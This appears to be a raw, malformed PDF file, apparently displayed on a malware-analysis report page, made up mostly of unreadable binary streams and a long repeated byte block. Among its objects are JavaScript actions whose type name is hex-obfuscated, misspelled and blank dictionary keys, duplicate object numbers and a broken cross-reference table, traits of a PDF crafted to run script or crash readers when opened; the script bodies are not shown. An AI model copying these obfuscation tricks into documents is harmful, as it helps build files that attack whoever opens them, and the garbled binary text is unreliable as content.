��:�.�ڊ���O�)�_K�)� ���=(�1NYI�'P�}��[Y�n T�: �i� �K�u���� �+���T` ��F � o2�� CD\�2�,R?Ͳ �t �� �P�U�� [[RG����A�# �JR��߄����� Y{�O� ��Jf�θ��Gt'�K&&B����M�� �~�����k�v�*��z� �W�|ޅ�A�%��{
��� �a��:9 U]����
�� ��� �)�6 �I� }i � �)}d��o�y� e�� �i����k���eG @�3e �4"g��W ف��br�u������K��w
���;'�Mh�5ʫ���W� �� Z�5k��GGM����� � ov��ߒJ��OH K� Ҝ�� i�R��T��xBjX�?!�,UOHK��'��� �����<�뭮 �� ���?�_�p �_��_��� � L ���O)N��v c�C��>���@��g| �o^?^q��旪@{�=|Ua���Xu��E �w�P���گ@ gǻ�\�����l�H���s�i��\���f�� ~}�!�`6�;�� 5�zy�� ��Y~��C��� � }���4���E&�e��S��Z�q�]s ����- [W�� � ��5��}�X]���b��rڅe�����u ��� ��4��'<�`�x� ��L� JJ�
N��J *�,*��� ��8 ��#�
endstream
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1990 0 obj
<</ / / / /S/#4a#61#76#61#53#63#72#69#70#74/JS 116 0 R/ / / />>
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
5 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
9 0 obj
<</ / / / /count 2/Type/Pages/Kids[1894 0 R]/ / / />>
endobj
123 0 obj
<</ / / / /Length 0000>>
stream
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
endstream
endobj
23 0 obj<</CropBox[0 0 595.22 842]/Parent 62 0 R/Contents 25 0 R/Rotate 0/MediaBox[0 0 595.22 842]/Resources 24 0 R/Type/Page>>
endobj
24 0 obj<</ColorSpace<</Cs6 59 0 R>>/Font<</TT2 52 0 R/TT3 54 0 R/TT4 45 0 R>>/ProcSet[/PDF/Text]/ExtGState<</GS1 57 0 R>>>>
endobj
25 0 obj[26 0 R 27 0 R 28 0 R]
endobj
26 0 obj<</Length 3>>stream
Y.в
endstream
endobj
91 0 obj
<</ / / / /S/JavaScript/JS 123 0 R/ / / />>
endobj
xref
trailer
<<
/Root 15 0 R
>>
startxrefx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� lx� # ��x� ��L� JJ�
N��J *�,*��� ��8 ��#�/� l
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.